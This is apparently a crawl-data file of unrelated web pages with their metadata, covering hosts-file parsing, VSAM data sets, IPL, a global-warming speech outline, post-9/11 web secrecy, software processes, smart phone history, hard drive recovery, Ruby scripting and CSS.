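    # Yield (address, [names]) per entry, skipping blanks and comments,
    # the way repeated gethostent() calls walk the host database.
    with open(path) as hostf:
        for line in hostf:
            line = line.split('#', 1)[0].strip()
            if not line:
                continue
            addr, *names = line.split()
            yield addr, names

for addr, names in host_entries():
    print(addr, names)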
<urn:uuid:a9a05b03-73e3-40ab-9b31-9cf12ec40b69>
CC-MAIN-2017-04
http://developer.blackberry.com/native/reference/core/com.qnx.doc.neutrino.lib_ref/topic/g/gethostent_r.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280504.74/warc/CC-MAIN-20170116095120-00463-ip-10-171-10-70.ec2.internal.warc.gz
en
0.809629
573
2.515625
3
Let's assume it is a fixed-length record, so it retrieves the 95th record.

VSAM relative file organization (also referred to as VSAM fixed-length or variable-length RRDS (relative-record data set) organization): A VSAM relative-record data set (RRDS) contains records ordered by their relative key. The relative key is the relative record number that represents the location of the record relative to where the file begins. The relative record number identifies the fixed- or variable-length record. In a VSAM fixed-length RRDS, records are placed in a series of fixed-length slots in storage. Each slot is associated with a relative record number. For example, in a fixed-length RRDS containing 10 slots, the first slot has a relative record number of 1, and the tenth slot has a relative record number of 10. In a VSAM variable-length RRDS, the records are ordered according to their relative record number. Records are stored and retrieved according to the relative record number that you set. Throughout this documentation, the term VSAM relative-record data set (or RRDS) is used to mean both relative-record data sets with fixed-length records and with variable-length records, unless they need to be differentiated.
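For the fixed-length case, retrieving the 95th record is simple arithmetic: every slot has the same size, so a record's position follows directly from its relative record number. A small illustrative sketch, with an assumed record length:

RECORD_LENGTH = 80   # assumed fixed slot size, in bytes

def slot_offset(relative_record_number):
    # Slot 1 starts at offset 0, slot 2 at 80, and so on.
    return (relative_record_number - 1) * RECORD_LENGTH

# Reading record 95 means seeking to its slot and reading one slot.
print(slot_offset(95))   # -> 7520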
<urn:uuid:23ca94d5-a2b5-4595-8506-e6fb17ac45b9>
CC-MAIN-2017-04
http://ibmmainframes.com/about3840.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280504.74/warc/CC-MAIN-20170116095120-00463-ip-10-171-10-70.ec2.internal.warc.gz
en
0.914219
261
2.6875
3
Others have already answered this, but I wanted to say it in my own words. Sorry for the duplication. An Initial Program Load (IPL) is what you'd call "booting" on a PC. At a deeper level, you might be asking what is "booting/IPLing"? The general issue comes from the fact that computer hardware doesn't know how to run sophisticated and powerful programs by itself. To do that, you need an operating system, and all hardware platforms have the capability of running multiple OSes... So you have a chicken & egg problem. The OS is needed to run programs, but a program is needed to load the OS. The solution is that the computer hardware comes with the ability to load/run a very simple program that must be stored at a very specific place on a disk/tape/CD. It's limited in capability, but has enough smarts to load the OS -- or, at least a part of the OS, which in turn is capable of loading programs, etc. So this simple program that the hardware knows how to run directly is called an "initial program". Now, on the PC they use the term "boot", which is short for "bootstrapping". This is a metaphor. A bootstrap is a small strap at the heel-end of a boot that you can use to pull the boot on. The metaphor is that this initial program is a small program used to load the larger program that implements the operating system. Thus, the term "bootstrapping", or "boot" for short. IBM has never liked using "clever" terms like this. They like the terms they use to be descriptive of the actual process. They prefer a name like "Find String with PDM (FNDSTRPDM)" over a name like "grep", for example... So "bootstrap" may be clever, but many won't understand what it means. Initial program load (IPL) describes exactly what's going on in plain English. Ironically, the term "boot" is understood by more people than IPL today. The way our world works is strange... On 10/13/2012 9:54 AM, John Mathew wrote: what is the purpose of IPL(Intial Program Load). What are steps involved in IPL. thanks in advance.
<urn:uuid:2dc144f3-8925-4282-ae5a-92fdd90a2d7d>
CC-MAIN-2017-04
http://archive.midrange.com/midrange-l/201210/msg00612.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.22/warc/CC-MAIN-20170116095120-00371-ip-10-171-10-70.ec2.internal.warc.gz
en
0.943183
516
3.078125
3
TOPIC: Global warming.
ORGANIZATIONAL PATTERN: Topical.
PURPOSE: With what I have learned from my class and researched on the internet, I want to inform my audience about the causes and effects of global warming.
PRIMARY AUDIENCE OUTCOME (I want my audience to…): acknowledge that global warming is really happening and that humans play an important part in this issue.
THESIS STATEMENT (A single declarative statement that captures the essence/theme of the speech): Global warming is happening because of anthropogenic activities in the past, and it has a lot of impact on human life.
ATTENTION GETTER: Do you know that 2015 was the hottest year on record since 1880, and that it is 99% likely to be surpassed by 2016? What would you think if I said that nine of the ten warmest years have occurred in the last 14 years? The five warmest years are 2015, 2014, 2010, 2005 and 2004. Where do those problems come from? The answer lies in global warming.
PURPOSE (state specific purpose, relate topic to audience and establish credibility): What is happening to the Earth will affect all of us (unless you have another house on Mars). So my speech today will address one of the problems that is threatening our lives: global warming.
STATE THESIS & MAIN POINTS: Many factors, including human activities, have been proven to cause global warming; on the other hand, the increase in Earth's temperature affects humans significantly, and many observed disasters are the consequence of global warming.
3-5 MAIN POINTS PREFERRED; USE ONLY COMPLETE SENTENCES
I. MAIN POINT (state as a single declarative sentence): Before we start, we need to know what global warming is.
A. Global warming is a term used for the observed century-scale rise in the average temperature of the Earth's climate system and its related effects.
1. Scientists are more than 90% certain that most global warming is caused by increasing concentrations of greenhouse gases and other human-caused activities.
B. The greenhouse effect is the trapping of the sun's warmth in a planet's lower atmosphere, due to the greater transparency of greenhouse gases in the atmosphere to visible radiation from the sun than to infrared radiation emitted from the planet's surface.
1. Greenhouse gases are those that absorb and emit infrared radiation in the wavelength range emitted by the Earth. The most abundant greenhouse gases in the atmosphere are water vapor (H2O), carbon dioxide (CO2), methane (CH4), nitrous oxide (N2O), and ozone (O3).
2. You can imagine the greenhouse effect as what happens in a greenhouse: the light goes through the glass, the heat is kept in by the glass and cannot get out, and that raises the temperature inside the greenhouse.
Connective: Now that you have the basic concept, we will move to the next part, which is the causes of global warming.
II. Global warming is primarily a problem of too much CO2 in the atmosphere, which acts like a blanket, trapping heat and warming the planet.
A. One of the things scientists have learned is that there are several greenhouse gases responsible for global warming, and humans emit them in a variety of ways.
1. The gas responsible for the most warming is carbon dioxide; other contributors are methane, nitrous oxide, and chlorofluorocarbons.
2. Different gases have very different heat-trapping abilities; some of them can trap more heat than CO2.
a. One molecule of CH4 produces more than 20 times the warming of a molecule of CO2.
b. Nitrous oxide is 300 times more powerful than CO2.
B. The sources of greenhouse gases are both anthropogenic and natural.
1. Humans are the main source of greenhouse gases.
a. CH4 is released from landfills and agriculture (especially from the digestive systems of grazing animals).
b. N2O comes from fertilizers, and CFCs from refrigerators and industrial processes; the combustion of fossil fuels in cars, factories and electricity production releases CO2, as does the loss of forests that would otherwise store it.
Connective: There is still skepticism about the causes of the rise in the Earth's temperature and the role of humans in global warming; still, many observed disasters that greatly affect human life are the consequence of global warming.
III. Global warming is already having significant and harmful effects on our communities, our health and our climate.
A. Higher temperatures are worsening many types of disasters, including storms, heat waves, floods, and droughts.
1. A warmer climate creates an atmosphere that can collect, retain, and drop more water, changing weather patterns in such a way that wet areas become wetter and dry areas drier.
B. The polar regions are particularly vulnerable to a warming atmosphere; average temperatures in the Arctic are rising twice as fast as they are elsewhere on earth, and the world's ice sheets are melting fast.
1. This not only has grave consequences for the region's people, wildlife, and plants; its most serious impact may be on rising sea levels.
a. By 2100, it's estimated our oceans will be one to four feet higher, threatening coastal systems and low-lying areas, including entire island nations and the world's largest cities, including New York, Los Angeles, and Miami as well as Mumbai, Sydney, and Rio de Janeiro.
C. The effects of global warming on the Earth's ecosystems are expected to be profound and widespread.
1. Many species of plants and animals are already moving their ranges northward or to higher altitudes as a result of warming temperatures.
RESTATE THESIS & REVIEW MAIN POINTS: Global warming is a complicated problem that needs more scientific research on its causes and effects; however, based on what we already know, it can be said that humans are definitely a part of the problem.
CONCLUDING PURPOSE (restate specific purpose, reinforce relevance of topic to audience): Earth is our home, so its life is our life. For that reason it is essential for us to comprehend what is causing our planet to become warmer and the consequences of that warming.
CLOSURE/CLINCHER (end with a bang, not a whimper): Now we know the facts of global warming, and knowledge is power. The more we know about it, the easier we can find the answer and solution.
COMM20 - Public speaking class.
<urn:uuid:772a0294-817a-4c8a-8256-59b3d73806f3>
CC-MAIN-2017-04
https://docs.com/kim-tran-1/7156/comm20
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.22/warc/CC-MAIN-20170116095120-00371-ip-10-171-10-70.ec2.internal.warc.gz
en
0.932104
1,501
2.609375
3
The terrorist attacks of Sept. 11 accelerated a trend that was beginning to develop in the world of public information. Concerns about the misuse of public information for planning terrorist attacks took center stage as federal, state and local agencies began to strip from Web sites information deemed too dangerous for public consumption. Security concerns superseded agencies' missions to provide useful information to the public and to use Web access to provide quick and easy answers to questions that would otherwise need to be fielded by agency personnel. The online revolution of the previous decade made online access to public information the model of choice among government agencies that had the technical resources and expertise to take advantage of the Internet. Moving from a reactive model of providing information in response to freedom of information requests or public affairs queries, government adopted a proactive model that allowed individuals rapid access to considerably more information than had been previously available. The model also encouraged a greater sense of interactive government where Web site access could provide clear and easy answers to questions about many government services and requirements. A significant benefit, from an agency's point of view, was that Web site access deflected the need for individuals to contact the agency directly for answers to basic questions. That model still exists, but its breadth was changed radically by the Sept. 11 attacks. Agencies continue to re-assess their online dissemination policies and to remove more information. A March memo from White House Chief of Staff Andrew Card instructed agencies to conduct "an immediate reexamination" of current measures to protect information about weapons of mass destruction. Although this memo was partly driven by reports that scientific papers providing information about how to make certain kinds of biological weapons were available through agency Web sites, it served a larger purpose as well. Card pointed out that weapons of mass destruction include "other information that could be misused to harm the security of our nation and safety of our people." A memo containing guidance, attached to Card's memo, suggested agencies review the status of classified information. That memo created a category for "sensitive, but unclassified" information and explained, "The need to protect such sensitive information from inappropriate disclosure should be carefully considered, on a case-by-case basis." OMB Watch, a public interest group in Washington, D.C., has been the most vocal critic of government's movement toward dismantling online public access. The group has kept a running tally of such incidents on its Web site. Among those agencies that have either permanently or temporarily taken information off their Web sites are the Department of Energy, NASA, the Nuclear Regulatory Commission, the Federal Energy Regulatory Commission, the U.S. Geological Survey and the National Archives. The Archives posted an explanation on its Web site saying, "In light of the terrorist events of Sept. 11, we are re-evaluating access to some previously open archival materials .... NARA seeks to reduce the risk of providing access to materials that might support terrorist activity." The states frequently follow the federal government's lead. 
In New York, a confidential memo prepared by James Kallstrom, director of the Office of Public Security, ordered agencies to review their holdings for "sensitive" information and to ensure that such information was not made public except where required by law. Kallstrom told the New York Times, "The intent, clearly, is to remove from the public Web sites that information that serves no other purpose than to equip potential terrorists. This is not an attempt just to shield legitimate information from the public." He added, "There is still a disconcerting amount of potentially compromising information still publicly accessible." While many agencies are taking information offline on their own initiative, state legislators have been more than willing to provide legislative directives as well. At least 17 states have passed or considered terrorism exemptions in the past legislative session. In Missouri, state Sen. Roseann Bentley proposed an exemption for records of public utilities, indicating that "in light of the new security demands on our nation, and the threats that water plants and electrical plants may be targets, the utility should be able to keep the security precautions private. Our water system in Springfield is an open lake. I don't want to frighten people, but it's very susceptible to something being put in that water." The problem with proposals like Bentley's is that they attempt to make secret something that is already public knowledge. The fact that Springfield draws its water supply from a nearby lake is already well known to Springfield residents and, probably, to many others as well. In Ohio, the Emergency Management Agency sent an e-mail to state and local agencies indicating that officials should "remove any information from public access which could potentially be misused." Such instructions have so far resulted in the closing of information about bridges and dams, the location of water mains and aerial photographs of government facilities. The U.S. Army Corps of Engineers took down information about locks and dams on the Ohio River. Corps spokeswoman Suzanne Fournier told the Cincinnati Enquirer, "We did that to protect the American public." Cincinnati Metropolitan Sewer District Director Pat Karney defended removing information about a local chemical facility. He told reporters, "It was absolutely nuts. It seemed to be nothing more than a catalog for terrorists to go through." One of the most controversial reversals of online access has been the EPA's decision not to make available "worst-case scenarios" for local chemical facilities. These documents discuss the consequences of a local disaster and have frequently been a focal point of the discussion of post-Sept. 11 decisions to take down information. However, Congress actually blocked EPA's plans to provide online access to such records nearly a year before Sept. 11 when the FBI suggested such records could be useful to terrorists. Congress put online access on hold while the issue was studied further.
How Much is Enough?
There is no doubt there is online information available that could be useful for terrorists. But such a broad standard for withholding information fails to take into account the possibility that much of the disputed information may have legitimate uses for others. Abraham Miller, an expert in terrorism at the University of Cincinnati, told the Enquirer, "It is better to err on the side of security. We do have a clear and present danger." But critics on the other side of the issue disagree.
Charles Davis, director of the University of Missouri's Freedom of Information Center, said, "There is so much deference to the security argument today. There's an assumption that secrecy guarantees security. That's where I get off the bus." Lucy Dalglish, executive director of the Reporters Committee for Freedom of the Press in Arlington, Va., made the case in her prefatory remarks to the Committee's publication, "Homefront Confidential: How the War on Terrorism Affects Access to Information and the Public's Right to Know." She said, "No one has demonstrated, however, that an ignorant society is a safe society. While some information logically should be withheld because it could pose a direct threat to American ground forces or tip off a terrorist that he is under surveillance, citizens are better able to protect themselves and take action when they know the dangers they are facing." One clear result of Sept. 11 is that government Web sites will never be quite the same again. The rush to broad, cheap and rapid access to public information resources encouraged by the online revolution of the 1990s has now been temporarily stopped in its tracks by questions about how much access is too much.
<urn:uuid:4661e36a-74c0-49b5-be69-ef59d401ff73>
CC-MAIN-2017-04
http://www.govtech.com/policy-management/An-End-to-Easy-Access.html
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281202.94/warc/CC-MAIN-20170116095121-00279-ip-10-171-10-70.ec2.internal.warc.gz
en
0.952212
1,504
2.765625
3
Many experts now credit the rise of Japan's automobile industry to its relentless application of just-in-time (JIT) manufacturing techniques and total quality management (TQM), or agile manufacturing, as opposed to the Frederick Taylor models of lean manufacturing practiced in the U.S. This shift represented a titanic change in processes, procedures and management techniques. Software organizations struggle to rein in projects by imposing stricter software processes. These processes are based on waterfall or iterative models with phasist structures stemming from Taylorist theories of efficiency. Over the past decade, new software processes based on JIT manufacturing principles, called agile methodologies, have been introduced into the software industry. However, there is huge reluctance in the software industry to make any adjustments even though, currently, all indicators point to something egregiously wrong. This situation in many ways resembles the turning point of the U.S. auto industry in the '70s and early '80s.

Stability of Processes

Humans successfully control many complex systems under unpredictable and changing conditions. Airplanes don't crash into the ground even when buffeted by gusts of wind, and power stations do not melt down under fluctuations in power draw. These complex systems are controlled by making measurements and corrections to keep the system in balance. The study of the systematic application of measures and corrections is called 'control theory'. The control of a system depends not only on the system's current state but also on how the system will respond to corrections or inputs. Control theory defines three categories of stability:

Stable: Stable systems resist change. When changes are made to a stable system, the system eventually returns to its starting state.

Neutral: Neutral systems respond to inputs in predictable ways.

Unstable or non-linear: Complex systems often respond to changes in unpredictable ways. In the real world, most complex systems are non-linear.

Many complex systems display stable characteristics when their elements are kept within certain parameters, called an "envelope of control." However, if the threshold is exceeded, unpredictable results may happen.

Software Process and Control

Automobile and passenger aircraft stability are desirable features. However, there are many instances where the desire of a system to return to its stasis point is detrimental. Fighter aircraft, for example, must be able to maneuver quickly to avoid other aircraft or incoming anti-aircraft artillery. Any attempt by the aircraft to return to its stable position would slow its reflexes. Traditional software engineering processes such as the waterfall model and the iterative model are built on Taylor's theories of lean management. These processes are developed on two fundamental assumptions: first, that each stage of the waterfall is progressively more expensive (from specification through implementation), and second, that the process itself is dynamically stable. These processes as a group are called "phasist." The assumption of progressively increasing costs leads to the practice of attempting to fully define requirements and design before beginning implementation. Since changes to the requirements after implementation begins are expensive, system control becomes an exercise in managing change. The stability assumption implies that Gantt-style planning tools optimally allocate resources.
Gantt charts allow resources to be aligned and allocated based on estimated cost through the process of leveling. This process depends on the project responding linearly to changes in resources, requirements and costs; in other words, the system must be stable or neutral.
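The three stability categories can be made concrete with the simplest possible discrete system, x(n+1) = a * x(n), after a one-off disturbance. This toy model is our illustration and is not from the original article.

def simulate(a, x0=1.0, steps=6):
    # x is the deviation from the stasis point after a disturbance x0.
    xs = [x0]
    for _ in range(steps):
        xs.append(a * xs[-1])
    return [round(x, 3) for x in xs]

print('stable   (a=0.5):', simulate(0.5))  # deviation dies out
print('neutral  (a=1.0):', simulate(1.0))  # deviation persists, predictably
print('unstable (a=1.5):', simulate(1.5))  # deviation blows up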
<urn:uuid:2beed68b-8ae0-4d9c-b12f-733160ce2bce>
CC-MAIN-2017-04
http://www.cioupdate.com/reports/article.php/3546861/Pivotal-Decisions-Process-Competition-and-Success.htm
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279410.32/warc/CC-MAIN-20170116095119-00491-ip-10-171-10-70.ec2.internal.warc.gz
en
0.939196
685
3.171875
3
Smart phone: 30 years in the making - By Kevin McCaney - Jul 08, 2013

Smart phones have become such ubiquitous tools for work and personal business that it's easy to take them for granted, even only a few years after they first appeared. And they have revolutionized how public-sector agencies do business. But they didn't just spring from Steve Jobs' mind — the technology behind them can be traced back to GCN's beginnings, and further, into government research projects. Here's a brief look at what's behind a smart phone's key components.

Camera: NASA developed the concept of a digital camera in the 1960s. Kodak built the first camera in 1975, but in the '90s NASA developed new ways of miniaturizing them with the CMOS active-pixel sensor.

GPS receiver: The Global Positioning System project was started in 1972 and became fully operational in 1995. In 2000, its highest-grade signals were opened up for civil use.

Network: The first analog cellular system, now known as 1G, was introduced in 1978. Cell phone use took off in the 1990s with 2G networks. 3G (mobile broadband) appeared in 2001, and by 2011 was giving way to 4G (WiMAX and LTE), which uses IP packet switching.

Touch screen: The first multitouch device was created at the University of Toronto in 1982. The HP 150, among the first touch-screen computers, appeared the next year. Improvements over the years came with the Apple Newton (1993), Sony's SmartSkin (2002) and other technologies. Touch screens took a leap forward in 2007 with the first iPhone. For the surface, many phones use Gorilla Glass.

System-on-a-chip: Thanks to Moore's Law (1965) holding true, advances in processor cores, GPUs, and other components mean they can be squeezed into a small, handheld form.

DRAM: Once the province of PCs, workstations and supercomputers, dynamic random access memory has been showing up in larger doses as smart phones get more sophisticated. According to one study, in 2011 no phone had more than 800M of DRAM; today, 4G, 8G and even 16G are becoming common.

Battery: Research into lithium-ion batteries dates to the 1970s, but the first prototype was built in 1985 and the first Li-ion battery hit the market in 1991. Its density has tripled since, but that trails far behind advances with other components. Today, most improvements in battery life are credited to more efficient, low-power systems.

Power amplifier/PMIC: Two things in the battery's corner: the power amplifier can extend battery life and speed up data rates, and the PMIC is an integrated circuit designed to manage power requirements.

Storage: Flash memory cards began appearing in the 1990s, and grew smaller, more capacious and cheaper over the past decade. Today, you can have a smart phone with up to 128G of storage.

Sensors: Most smart phones have gyroscopes and accelerometers, and some new models are adding barometers, thermometers and hygrometers (for humidity). NASA began working on miniaturized microsensors for weather research in 1992.

Magic act: To get an idea of just how disruptive smart phones have been, here are a few things they are helping to make disappear: music players, radios, cameras, video cameras, planners, music and image storage, boarding passes, phone books, rolodexes, instrument tuners, maps, pay phones, calculators, books and, for some users, PCs.

Kevin McCaney is a former editor of Defense Systems and GCN.
<urn:uuid:214cbe62-cdf7-47dd-ab12-6b2bb7d4b6b6>
CC-MAIN-2017-04
https://gcn.com/articles/2013/05/30/gcn30-smartphone-30-years-in-the-making.aspx
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280730.27/warc/CC-MAIN-20170116095120-00573-ip-10-171-10-70.ec2.internal.warc.gz
en
0.94758
783
3.0625
3
When a hard drive starts making unusual clicking noises, it is because the drive's magnetic read/write heads have run into a problem while attempting to read data from its platters. Although this can happen for a few reasons, in many data recovery cases it is because the read/write heads themselves have failed and caused platter damage. Read/write heads are delicate instruments and are the most common failure points in a hard drive, whether due to physical shock or simply as a result of natural wear and tear. In this case, an inspection of the client's Hitachi desktop hard drive by our cleanroom data recovery engineer Drew showed that the read/write heads were mangled and had caused the drive significant platter damage.
Recovery Type: Desktop Drive
Capacity: 1TB
Model Name: Deskstar 7K1000.C
Model Number: HDS721010CLA632
Manufacture Date: 11/2009
Main Symptom: Hard Drive Clicking, HDD Read/Write Heads Failure, Platter Damage
Type of Data Recovered: Pictures, Documents, Outlook Files
Data Recovery Grade: 9
Binary Read: 54.5%
Clicking Hard Drives
Normally, a hard drive's magnetic read/write heads hover 3 to 5 nanometers above the surface of the platters, a length equivalent to about 60-100 hydrogen atoms arranged end-to-end. While it can be tempting to describe the way a hard drive works by comparing it to a record player, unlike the needle of a record player, at no point are the heads ever meant to make physical contact with the platters. And a hard drive's platters are meant to be smooth surfaces with none of the grooves you would see on a vinyl record. But when a drive's heads fail, they can sometimes make contact with the platters' surfaces, and the scratches that result are referred to as platter damage. If a read/write head makes brief contact with the platter, it creates tiny "dings" on the platter's surface. Prolonged contact between the heads and platters (which are spinning at thousands of revolutions per minute) cuts a circular path of destruction through the magnetic substrate containing all of the data on the drive and makes the platters start to resemble something that does belong on a turntable.
Severe Platter Damage – Rotational Scoring
This behavior is known as rotational scoring, and severe enough scoring can make data recovery impossible. But there was still plenty of hope for this case. While there was a bit of visible scoring on one surface of the drive's platters, in cleanroom data recovery cases such as this one, where the scoring is not too severe, our engineers can make use of our hard drive platter burnisher. While burnishing the platters cannot restore the sectors that have already been scratched and scraped out of existence by the failed heads, it does clean debris from and smooth out the surfaces of the platters so that a new and functional set of read/write heads will not fall into the same rut as the old, mangled set. After burnishing the hard drive's platters and swapping in a fresh pair of read/write heads, our cleanroom data recovery engineers were able to read 13.3% of the hard drive's total binary sectors and 100% of the drive's file definitions. Because all of the file definitions on this hard drive had been read, we could be certain that we knew about all of the files on the disk—even ones we hadn't fully recovered yet. At this point, 83.2% of the client's files had been fully recovered.
We presented a preliminary list of files to the client before continuing with our data recovery efforts, and after sending the hard drive back to our cleanroom and replacing the drive's read/write heads one more time, we were able to read 54.5% of the drive's binary sectors in total and recover 95.1% of the client's files.
Repairing the PST
Like many of the clients we see, the owner of this hard drive stored their email archives in an Outlook PST file. The client's most recent PST file on the drive took up just over 20 gigabytes of disk space. Even after placing two new sets of read/write heads in the failed hard drive, our engineers were unable to completely recover the PST file, because some of the sectors that had been destroyed by the drive's failed heads just happened to be where a portion of that large PST file lived on the disk. This didn't mean the client's email archive was unusable, however. We had recovered a significant enough portion of the PST file's sectors that our logical engineers were able to repair the file. While there was still some data missing from the file, the client would still be able to open it, see everything in the email archive our engineers were able to recover, and continue to archive their future emails. The client was pleased with the results, and our engineers rated this cleanroom data recovery case a 9 on our ten-point scale.
<urn:uuid:8db0e62e-19aa-47e7-bad9-22106f3575af>
CC-MAIN-2017-04
https://www.gillware.com/blog/data-recovery/case-study-hitachi-platter-damage/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282932.75/warc/CC-MAIN-20170116095122-00141-ip-10-171-10-70.ec2.internal.warc.gz
en
0.956988
1,090
2.6875
3
We often fear what we do not know. For many IT admins, this is Ruby code. JNUC session presenter Chris Lasell was on hand today to help provide clarity and ultimately alleviate users' apprehension of coding in Ruby. He started with some familiar names: Python, Perl, Advanced Bash, etc., and clarified that attendees already understood data types, conditionals and loops. Then Lasell introduced gem – the command for installing and working with Ruby packages. Next he discussed irb, or interactive Ruby, a shell where users type Ruby code. "It's useful for testing your code as you write, or for performing one-off tasks," he explained. "'require' tells Ruby to read and execute some pre-written code." Take a look:
> require 'intro-ruby'
To keep it simple, think of everything in Ruby as an object. "Objects equal nouns," Lasell explained. He added that there are many kinds of objects, like Strings and Integers, each with different attributes and abilities. Think of: Kind = Class. And every action is a method. So, methods equal verbs, or functions. They make objects do things, like retrieving attributes and performing actions. Methods are called by appending the method name to an object after a dot. And different classes have different methods.
=> NoMethodError: undefined method 'capitalize' for 15:Fixnum
Things to note about methods:
- Some work as-is
- Some require parameters
- Parens are (usually) optional
- Each one's documentation will tell you how to use it
Lasell added, "Because methods return values, method calls can be chained. And some methods work with no target, seemingly." The session dove into detail about variables and constants, quoting strings, and string interpolation before looking at symbols, arrays and hashes. "Ruby comes with many classes," Lasell recapped. "Some are immediately available in the core, and some need to be loaded in by requiring a library." Or, he excitedly announced, you can write your own. Jam-packed with information, the session continued a deep dive into the depths of Ruby. From modules to iterators, and everything in between, Lasell shared examples of how everything works, sharing code along the way. He also explained how Ruby works with the JSS REST API, giving the advice, "Be sure the user has enough permissions!" The discussion included key bits of information like:
- To delete, call the .delete method, and it happens immediately
- Extension Attributes can return current values
- To create an object not yet in the JSS, use "id: :new" and provide at least a name
Lasell ended with a treat – going beyond the code. He briefly explained Core Library, Standard Library, Gems and Resources. While attendees may not yet be proficient with Ruby, they got a glimpse into the not-so-scary code and saw how it could be used to simplify API access. Next steps – go forth and conquer.
<urn:uuid:8d978c25-c618-40be-8a2d-b0d705c0500c>
CC-MAIN-2017-04
https://www.jamf.com/blog/alleviate-the-apprehension-of-coding-in-ruby/
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560282932.75/warc/CC-MAIN-20170116095122-00141-ip-10-171-10-70.ec2.internal.warc.gz
en
0.917728
678
2.9375
3
What is it? Cascading Style Sheets (CSS) offers a way of adding styles, such as fonts and colours, to web documents. CSS enables presentation to be separated from content to cope with the different platforms on which web pages are displayed. According to website accessibility expert Jakob Nielsen, "Web style sheets are cascading, meaning that the site's style sheet is merged with the user's style sheet to create the ultimate presentation. These differences make it important that web style sheets are designed by a specialist who understands the many ways the result may look different than what is on his or her own screen." Style sheets may be external, meaning they can be specified once and applied to all the documents on a website, or embedded within a particular document.
Where did it originate? CSS began life in 1994 at CERN, the cradle of the web, when Håkon Wium Lie published the first draft of cascading HTML style sheets. He had the backing of HTML 3.0 architect Dave Raggett, who realised that HTML needed a purpose-built page description mechanism. In February 1997 CSS got its own World Wide Web Consortium (W3C) working group. The first commercial browser to support CSS was Microsoft's Internet Explorer 3.
What is it for? Different style sheets arrive in a series, or cascade, and any single document can end up with style sheets from multiple sources, including the browser, the designer and the user. Cascading order sorts out which set of rules is to influence the presentation.
What makes it special? CSS gives a greater level of control over how work is presented than HTML alone can offer.
How difficult is it to master? Style sheets can either be hand-written using a text editor or built with one of the growing number of web design tools which support CSS. The W3C CSS home page has a list of these tools, which include Dreamweaver, Adobe GoLive and HomeSite. You do not need to know CSS syntax, but those who do can fine-tune their style sheets.
Where is it used? CSS is currently the most widely supported way of styling web documents.
Not to be compared with... cascading system failures - the impact of the collapse of one part of an infrastructure on the next.
What systems does it run on? CSS is supported by most current browsers and web design tools.
Not many people know that... "CSS is now being taken up, but HTML is in danger again," said Bert Bos, W3C's style sheet activities co-ordinator.
What is coming up? CSS3, six years in the making, promises to be much simpler to use than CSS2/2.1.
You should not need to spend much money learning CSS. The World Wide Web Consortium has comprehensive links to tutorials, how-to articles and books by the likes of Håkon Wium Lie, Bert Bos, Dave Raggett and Jakob Nielsen. Most date back a few years, but remember that the current level, CSS2, has been around since 1997.
Rates of pay: CSS is used by web designers but is also sought in software developers, testers and technical authors. Rates vary accordingly.
<urn:uuid:6faa1dd0-657d-49ea-8f51-54e45915e06d>
CC-MAIN-2017-04
http://www.computerweekly.com/news/2240056970/Cascading-Style-Sheets-separate-presentation-from-website-content
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279933.49/warc/CC-MAIN-20170116095119-00446-ip-10-171-10-70.ec2.internal.warc.gz
en
0.932556
696
3.25
3
Pre-Computers Era
This can be termed the 'pen and paper' era, and it witnessed the building of the foundation. The concept of numbers became concrete. The zero was invented by Brahmagupta or Aryabhata, depending on which way you look at it, and number systems evolved. The earliest known tool used in computation was the abacus, thought to have been invented around 2400 BC. A number of devices based on mechanical principles were invented to help in computing, leading even to analog computers. Computational theory also evolved, with the advent of logarithms and related techniques. The concept of using digital electronics for computing, which led to modern computers, is recorded around 1931. Alan Turing modelled computation, leading to the well-known Turing machine. The ENIAC, the first electronic general-purpose computer, was announced to the public in 1946. Since then, computers have come a long way. There are supercomputers. There is a variety of devices like mainframes, servers, desktops, laptops and mobiles. There is specialized hardware like gateways, routers and switches for networking, which enabled the culmination of the internet and the World Wide Web as we know them. There are storage arrays for all the storage-related capabilities, including snapshots, backups and archival. There are Application Specific Integrated Circuits (ASICs), and so on and so forth.
Software Defined Era
Soon enough, this hardware started getting driven by software. The software grew more and more sophisticated. It evolved over paradigms like multi-tier architecture, loosely coupled systems and off-host processing. There were advances in the area of virtualization. A lot of concepts in computing could be abstracted easily at various levels, and this enabled a lot of use cases. For example, routing logic moved to software, and hence networks could be reconfigured on the fly, enabling migration of servers and devices in response to user and application requirements. Tiered storage can be exposed as a single block store as well as a file system store at the same time, giving the capability of laying out the data efficiently in the backend without compromising the ease of managing it effectively from a variety of applications. The cloud started making everything available everywhere for everyone. Concepts like Software Defined Networking (SDN) and Software Defined Storage (SDS) are leading to Software Defined Everything (yes, some people have started coining such a term, and you will start seeing it widely soon enough). Hardware is getting commoditized, and specialized software addressing these needs is on the rise.
It is still not clear what will replace software. However, some trends and key players have already started to emerge in this direction. There can be a number of components, such as open source software, readily available as building blocks; one might have to just put them together to solve a variety of problems without writing much code. Computing has moved away from "computing devices" into general-purpose common devices like watches, clothing, cars, speakers, even toasters. Every device is becoming intelligent. The hardware ecosystem is more or less commoditized already, and software is on the same path. Witness the proliferation of OpenStack or IoT platforms, for example; one might have to simply configure them to address the needs. For example, OpenStack Cinder can be configured to clone volumes for creating test-dev environments efficiently.
IoT can make a production plant efficient in real time through continuous monitoring, reconfiguration and management of its resources. It could be Docker containers that one has only to deploy, plug-and-play style, to have complete solutions running. Handwriting recognition and voice-commanded devices can turn a mere thought into a complete working solution! Machine learning can provide fully functional machines like smart cars. Who knows, a day might come when, without doing anything, everything will be achieved seemingly out of thin air! At this time it might sound like a wild stretch of imagination, but just quickly reflect on the evolution of computing so far. It might take a really long time to get there. In fact, it might soon be just a matter of making some Google searches and looking around with open eyes for everyone to grasp the gist of the message!
<urn:uuid:8453c4bd-7f75-4348-b7a6-eebe11d57301>
CC-MAIN-2017-04
http://gslab.com/blogs/tags/tag/sdn
null
s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281426.63/warc/CC-MAIN-20170116095121-00078-ip-10-171-10-70.ec2.internal.warc.gz
en
0.952147
871
3.671875
4
